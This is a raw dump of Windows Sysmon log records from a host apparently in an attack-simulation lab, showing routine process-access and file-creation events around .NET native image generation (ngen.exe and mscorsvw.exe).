13:46:13.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9125-6005-AF01-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:13.390{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9125-6005-AF01-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:13.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9125-6005-AF01-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:13.328{59A5CD1D-9124-6005-AE01-00000000A301}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\127c-0\Microsoft.Build.Utilities.v4.0.dll2021-01-18 13:46:13.328 10341000x80000000000000005945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:14.156{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9126-6005-B501-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.140{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9126-6005-B501-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:14.140{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9126-6005-B501-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.062{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9126-6005-B401-00000000A301}4924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.062{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9126-6005-B401-00000000A301}4924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9126-6005-B401-00000000A301}4924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9126-6005-B301-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:14.000{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9126-6005-B301-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:14.000{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9126-6005-B301-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:15.922{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9127-6005-B901-00000000A301}4428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.906{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9127-6005-B901-00000000A301}4428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:15.906{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9127-6005-B901-00000000A301}4428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:15.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9127-6005-B801-00000000A301}4076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.843{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9127-6005-B801-00000000A301}4076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:15.843{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9127-6005-B801-00000000A301}4076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:15.625{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9127-6005-B701-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.625{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9127-6005-B701-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:15.625{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9127-6005-B701-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:15.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9127-6005-B601-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:15.562{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9127-6005-B601-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:15.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9127-6005-B601-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.N